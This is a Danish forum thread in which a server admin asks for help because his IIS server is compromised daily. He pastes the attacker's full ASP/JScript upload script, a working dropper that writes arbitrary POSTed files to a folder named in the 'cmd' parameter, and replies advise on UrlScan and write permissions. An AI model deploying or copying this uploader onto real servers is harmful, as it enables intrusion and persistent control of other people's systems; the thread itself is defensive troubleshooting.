HJÆLP min server blir hacket !

Du skal jo have "lukket" det hul han uploader filerne igennem.

Hvis en bruger har en usikker side, hvor man kan vælge at uploade:

filemanager.asp og den efterfølgende giver fuldadgang til din server, så kan du jo patche så meget du vil.

Nu er jeg ikke den store IIS man, men i gamle dage kan jeg da huske et program der hed: UrlScan, måske det kan give dig bedre sikkerhed generelt?
Omend det nok ikke kan garantere mod dårlig kodet hjemmesider.

Du kunne jo lige tage fat i "katjakh.dk" og bede dem få fingrene af fadet?

Det er hovedsagelig mine egne kodede sider. dvs MVC projekter ... Som er ret godt beskyttet.

Men du er helt sikkert inde på noget med IIS'en, eller det UrlScan, som jeg har læst noget om ...

Man må ku blokere for skriveadgang til roden, eller måske ændre på det der "trust level" Måske nogen har erfaring med det ?

Sådan her ser det script ud, han får uploader og kørt på alle sites næsten hver dag ...


<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
ok
<%  strFolderNmae=Request.QueryString("cmd");
      if(strFolderNmae=="")
            Response.Write( "null");
      else
%>
<%
    if (Request.serverVariables("REQUEST_METHOD")=="POST")
    {
            var oo = new uploadFile();
            oo.path = "/";                     
            oo.named = "file";                     
            oo.ext = "all";                             
            oo.over = false;                         
            oo.size = 1*1024*1024;           
            var fname= oo.getFileName();
            oo.upload();
           
            Response.write("Stored in: "+ fname);
            Response.End();
    }


function uploadFile()
{
    var bLen  = Request.totalBytes;
    var bText = Request.binaryRead(bLen);
    var oo = Server.createObject("ADODB.Stream");
    oo.mode = 3;
        this.path = "uploadFile";
        this.named = "file";
        this.ext = "all";
        this.over = false;
        this.size = 1*1024*1024*1024;       


        this.upload = function ()
        {
                var o = this.getInfo();
                if (o.size>this.size)
                {
                        //alert("file too big,cannot upload");
                        return;             
                }
                var f = this.getFileName();
                var ext = f.replace(/^.+\./,"");
                if (this.ext!="all"&&!new RegExp(this.ext.replace(/,/g,"|"),"ig").test(ext))
                {
                        //alert("Currently does not support the extension "+ext+" File upload!");
                        return;
                }
                if (this.named=="date")
                {
                        f = new Date().toLocaleString().replace(/\D/g,"") + "." + ext;
                }

                oo.open();
                oo.type = 1;
                oo.write(o.bin);
                this.path = strFolderNmae;
                var fso = Server.createObject("Scripting.FileSystemObject");
                if(this.path!=""&&!fso.folderExists(Server.mapPath(this.path)))
                {
                        fso.createFolder(Server.mapPath(this.path));
                }
                try
                {
                        oo.saveToFile(Server.mapPath(this.path+"/"+f),this.over?2:1);
                        //alert("Uploaded successfully!");
                }
                catch(e)
                {
                        //alert("This file already exists");
                }
                oo.close();
                delete(oo);

        }

        this.getInfo = function ()
        {
                oo.open();
                oo.type=1;
                oo.write(bText);
                oo.position = 0;                             
                oo.type=2;
                oo.charset="unicode";
                var gbCode=escape(oo.readText()).replace(/%u(..)(..)/g,"%$2%$1");
                var sPos=gbCode.indexOf("%0D%0A%0D%0A")+12;
                var sLength=bLen-(gbCode.substring(0,gbCode.indexOf("%0D%0A")).length/3)-sPos/3-6;
                oo.close();
     
                oo.open();
                oo.type = 1;     
                oo.write(bText);
                oo.position=sPos/3;
                var bFile=oo.read(sLength);
                oo.close();
             
                return { bin:bFile, size:sLength };
        }

           
        this.getFileName = function ()
        {
                oo.open();
                oo.type = 2;
                oo.writeText(bText);
                oo.position = 0;
                oo.charset = "gb2312";
                var fileName = oo.readText().match(/filename=\"(.+?)\"/i)[1].split("\\").slice(-1)[0];
                oo.close();
                return fileName;
        }
     
        function alert(msg)
        {
                Response.write('<script type="text/javascript">alert("'+msg+'");</script>');
        }
}
%>

det nævnte domæne, er bar 1 ud af 60 ...

Ach. Under alle omstændigheder giver du aldrig skriveadgang til rod-kataloget, og altid kun navngiven bruger skriverettigheder til specifikt katalog.
Jeg går ud fra at anonymous IKKE har skriverettigheder?

Jeg har givet skriverettigheder til "alle" i nogle specifikke mapper. hvor folk uploader billeder, me dem holder jeg nøje øje med og dem kommer der aldrig noget skørt ind i.

Der er bestemt ingen problemer i at uploade et scriptsæt til den upload-folder, lade det stå og koge lidt, til der er opnået tilpas (eleverede!) rettigheder til din server, for derefter at rydde pænt op efter sig.

Man giver ALDRIG "Everyone"/"Anonymous" adgang til at skrive på en webserver.

CRKrogh, post et svar så får du points :)

CRKrogh, vil du have point ? så post et tomt svar :)
Problemet blev løst ....

Lukket